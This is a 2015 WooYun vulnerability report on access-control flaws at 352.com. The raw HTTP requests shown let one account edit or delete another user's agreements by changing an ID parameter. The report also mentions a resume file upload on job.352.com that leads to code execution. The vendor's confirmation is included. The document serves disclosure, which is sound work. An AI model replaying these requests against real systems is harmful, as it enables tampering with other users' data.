当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118378

漏洞标题:融资城网络越权修改删除用户协议

相关厂商:352.com

漏洞作者: 勿忘初心

提交时间:2015-06-05 11:11

修复时间:2015-07-20 11:56

公开时间:2015-07-20 11:56

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

RT

详细说明:

1、越权修改
注册两个账号,账号A随便创建一份协议

1.png


点击查看协议,确定协议号

2.png


账号B,创建协议

3.png


账号A点击修改,抓包

POST /member/agr/updateAgr.do HTTP/1.1
Host: www.352.com
Proxy-Connection: keep-alive
Content-Length: 100
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.352.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.352.com/member/agr/agrInfo.do?agrId=189090&operate=edit&signState=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: cookie_user=b90e6c92c30a4dfcae24f7177bdb406f; cf=#u30; cp=#u30; cln=""; su=#u30; JSESSIONID=A8743E04E6309B8D7171582E27B32E1A.a; at=#u534e#u6587#u6709#u9650#u516c#u53f8; bid=#u38#u36#u31#u38#u33#u38#u31#u35#u30#u36#u30#u34#u33#u35#u39#u38; chknum=#u31; rn=""; mi=""; cr=#u30; Hm_lvt_9ee5e8baadd4fd8000f63f7e91665495=1433422300,1433468689; Hm_lpvt_9ee5e8baadd4fd8000f63f7e91665495=1433471836; Hm_lvt_cd84449f9d5b37a5fc86a6f755298cbc=1433422301; Hm_lpvt_cd84449f9d5b37a5fc86a6f755298cbc=1433471837; WHOSYOURDADDY=1
agree.id=189090&signState=0&agree.agrName=2222222222&agree.agrType=101&agree.agrContent=222222222222


修改id
成功修改

4.png


漏洞证明:

2、越权删除
删除协议,抓包

GET /member/agr/deleteAgr.do?&signState=0&agrId=189091 HTTP/1.1
Host: www.352.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://www.352.com/member/agr/myAgr.do?signState=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: cookie_user=b90e6c92c30a4dfcae24f7177bdb406f; cf=#u30; cp=#u30; cln=""; su=#u30; JSESSIONID=A8743E04E6309B8D7171582E27B32E1A.a; at=#u534e#u6587#u6709#u9650#u516c#u53f8; bid=#u38#u36#u31#u38#u33#u38#u31#u35#u30#u36#u30#u34#u33#u35#u39#u38; chknum=#u31; rn=""; mi=""; cr=#u30; Hm_lvt_9ee5e8baadd4fd8000f63f7e91665495=1433422300,1433468689; Hm_lpvt_9ee5e8baadd4fd8000f63f7e91665495=1433472675; Hm_lvt_cd84449f9d5b37a5fc86a6f755298cbc=1433422301; Hm_lpvt_cd84449f9d5b37a5fc86a6f755298cbc=1433472675; WHOSYOURDADDY=1


居然为get请求,修改agrID,成功删除

5.png


6.png


3、附送job.352.com简历中任意文件上传导致恶意代码执行
http://www.352.com/upimages/1433469247878.html

7.png

修复方案:

权限控制
每次从深圳北站出来都看到融资城大大的牌子!
据说有礼物?

版权声明:转载请注明来源 勿忘初心@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-05 11:55

厂商回复:

感谢你的帮助

最新状态:

暂无

漏洞评价:

评论